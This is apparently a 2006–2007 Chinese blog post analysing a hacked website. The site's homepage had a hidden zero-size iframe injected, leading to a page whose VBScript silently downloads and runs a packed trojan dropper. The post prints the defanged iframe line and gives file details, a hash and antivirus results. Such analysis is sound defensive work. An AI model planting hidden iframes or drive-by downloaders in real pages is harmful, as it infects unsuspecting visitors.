|
endurer 原创
2007-01-06 第2版 补充 Kaspersky 的反应
2006-12-27 第1版
该网站首页被加入代码:
/-------
...<iframe src=hxxp://www..xj123***.net/ad***/*1***/*1 width=0 height=0 frameborder=0></iframe>
-------/
打开 hxxp://www..xj123***.net/ad***/*1***/*1 会自动转到
hxxp://i***.the***c**.***.cn/*sinze***/sinze.htm
打开这个 sinze.htm 网页,会看到信息:
/-------
就不让你看!气死你 by knel!
-------/
但这只是表面,该网页下面的 VBScript脚本代码会背地里会利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
sinze.exe 采用 SVKP 1.3x -> Pavol Cerven 加壳。
/-------
文件说明符 : d:/test/sinze.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-11 4:25:57
修改时间 : 2006-12-11 4:25:58
访问时间 : 2006-12-27 0:0:0
大小 : 424621 字节 414.685 KB
MD5 : 1937f1ba8627794e232db40a11b8ec0f
-------/
瑞星19.03.12对此文件无反应。
由于昨晚南海海域发生地震,多条海底通信光缆中断,无法使用国外网站的多引擎扫描测试……
| Scanned file: sinze.exe - Infected |
sinze.exe - infected by Trojan-Dropper.Win32.Agent.awq
Statistics:
| Known viruses: | 256347 | Updated: | 06-01-2007 | | File size (Kb): | 415 | Virus bodies: | 1 | | Files: | 1 | Warnings: | 0 | | Archives: | 0 | Suspicious: | 0 |
|
| 
转播
